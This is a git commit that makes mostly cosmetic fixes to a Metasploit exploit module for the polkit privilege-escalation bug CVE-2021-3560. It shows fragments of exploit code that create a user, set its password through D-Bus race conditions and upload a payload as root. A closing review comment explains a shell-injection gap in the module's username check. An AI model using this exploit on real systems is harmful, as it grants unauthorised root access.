Updated docs

Jack Heysel 2021-06-28 14:02:51 -04:00 committed by Grant Willcox
parent fdbf669da2
commit 9a07039e7e
No known key found for this signature in database
GPG Key ID: D35E05C0F2B81E83
2 changed files with 16 additions and 16 deletions


@ -1,6 +1,6 @@
## Description ## Description
This module exploits a authentication bypass in Linux machines that make use of the polkit is a system service. This module exploits a authentication bypass in Linux machines that make use of the polkit system service.
The vulnerability enables an unprivileged local user to get a root shell on the system. The vulnerability enables an unprivileged local user to get a root shell on the system.
## Vulnerable Application ## Vulnerable Application
@ -27,15 +27,15 @@ Download and install Ubuntu 20.04 from the Ubuntu Downloads page: https://ubuntu
**SESSION** **SESSION**
The session to run this module on. The session to run this module on.
**WRITABLE_DIR**
Directory to write file to (`%TEMP%` by default).
**USERNAME** **USERNAME**
The name of the user the exploit will add to the system The name of the user the exploit will add to the system
**PASSWORD** **PASSWORD**
The password for the user to be created The password for the user to be created
**WritableDir**
Directory to write file to (`%TEMP%` by default).
## Scenarios ## Scenarios
### Tested on Ubuntu 20.04 ### Tested on Ubuntu 20.04


@ -42,7 +42,7 @@ class MetasploitModule < Msf::Exploit::Local
'References' => [ 'References' => [
['URL', 'https://github.blog/2021-06-10-privilege-escalation-polkit-root-on-linux-with-bug/'], ['URL', 'https://github.blog/2021-06-10-privilege-escalation-polkit-root-on-linux-with-bug/'],
['CVE', '2021-3560'], ['CVE', '2021-3560'],
['EDB', '50011'], ['EDB', '50011']
], ],
'Targets' => 'Targets' =>
[ [
@ -60,7 +60,7 @@ class MetasploitModule < Msf::Exploit::Local
register_options([ register_options([
OptString.new('USERNAME', [ true, 'A username to add as root', 'msf' ], regex: /^[a-z_]([a-z0-9_-]{0,31}|[a-z0-9_-]{0,30}\$)$/), OptString.new('USERNAME', [ true, 'A username to add as root', 'msf' ], regex: /^[a-z_]([a-z0-9_-]{0,31}|[a-z0-9_-]{0,30}\$)$/),
OptString.new('PASSWORD', [ true, 'A password to add for the user (default: random)', rand_text_alphanumeric(8)]), OptString.new('PASSWORD', [ true, 'A password to add for the user (default: random)', rand_text_alphanumeric(8)]),
OptString.new('ITERATIONS', [ true, 'Due to the race condition the command might have to be run multiple times before it is successful. Use this to define how many times each command is attempted', 20]) OptInt.new('ITERATIONS', [ true, 'Due to the race condition the command might have to be run multiple times before it is successful. Use this to define how many times each command is attempted', 20])
]) ])
register_advanced_options([ register_advanced_options([
OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp']) OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])
@ -145,7 +145,7 @@ class MetasploitModule < Msf::Exploit::Local
if exploit_set_realname(rand_text_alphanumeric(12)) if exploit_set_realname(rand_text_alphanumeric(12))
status = CheckCode::Vulnerable('The polkit framework instance is vulnerable.') status = CheckCode::Vulnerable('The polkit framework instance is vulnerable.')
unless exploit_set_realname(old_realname) unless exploit_set_realname(old_realname)
print_error('Failed to restore the root user\'s orignal \'RealName\' property value') print_error('Failed to restore the root user\'s original \'RealName\' property value')
end end
end end
end end
@ -227,9 +227,9 @@ class MetasploitModule < Msf::Exploit::Local
cmd_args << object_path cmd_args << object_path
cmd_args << interface_member cmd_args << interface_member
args.each do |arg| args.each do |arg|
if arg.is_a? Integer if arg.is_a?(Integer)
cmd_args << "int32:#{arg}" cmd_args << "int32:#{arg}"
elsif arg.is_a? String elsif arg.is_a?(String)
cmd_args << "string:'#{arg}'" cmd_args << "string:'#{arg}'"
end end
end end
@ -320,15 +320,15 @@ class MetasploitModule < Msf::Exploit::Local
end end
def upload(path, data) def upload(path, data)
print_status "Writing '#{path}' (#{data.size} bytes) ..." print_status("Writing '#{path}' (#{data.size} bytes) ...")
rm_f path rm_f(path)
write_file path, data write_file(path, data)
register_file_for_cleanup path register_file_for_cleanup(path)
end end
def upload_and_chmodx(path, data) def upload_and_chmodx(path, data)
upload path, data upload(path, data)
chmod path chmod(path)
end end
def upload_payload def upload_payload
@ -351,7 +351,7 @@ class MetasploitModule < Msf::Exploit::Local
if exploit_set_username(loop_sequence) if exploit_set_username(loop_sequence)
uid = cmd_exec("id -u #{datastore['USERNAME']}") uid = cmd_exec("id -u #{datastore['USERNAME']}")
print_good("User #{datastore['USERNAME']} created with UID #{uid}") print_good("User #{datastore['USERNAME']} created with UID #{uid}")
print_status("Attempting to set the password of the newly create user, #{datastore['USERNAME']}, to: #{datastore['PASSWORD']}") print_status("Attempting to set the password of the newly created user, #{datastore['USERNAME']}, to: #{datastore['PASSWORD']}")
if exploit_set_password(uid, create_unix_crypt_hash, loop_sequence) if exploit_set_password(uid, create_unix_crypt_hash, loop_sequence)
print_good('Obtained code execution has root!') print_good('Obtained code execution has root!')
fname = upload_payload fname = upload_payload
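Review bot: The USERNAME validator in the `register_options` hunk (`@ -60,7 +60,7`) anchors with `^` and `$`, which in Ruby match at line boundaries rather than at the ends of the string, so a multi-line value can pass as long as one of its lines looks like a valid account name. That value is later interpolated unquoted into `cmd_exec("id -u #{datastore['USERNAME']}")` in the last hunk, so the option check appears to be the only thing constraining what reaches the shell. Anchoring the whole string closes the gap: `regex: /\A[a-z_]([a-z0-9_-]{0,31}|[a-z0-9_-]{0,30}\$)\z/`. The `register_options` call sits in a method that starts outside the hunk, and how `OptString` applies the regex is not visible here, so confirm it is a plain match against the full value.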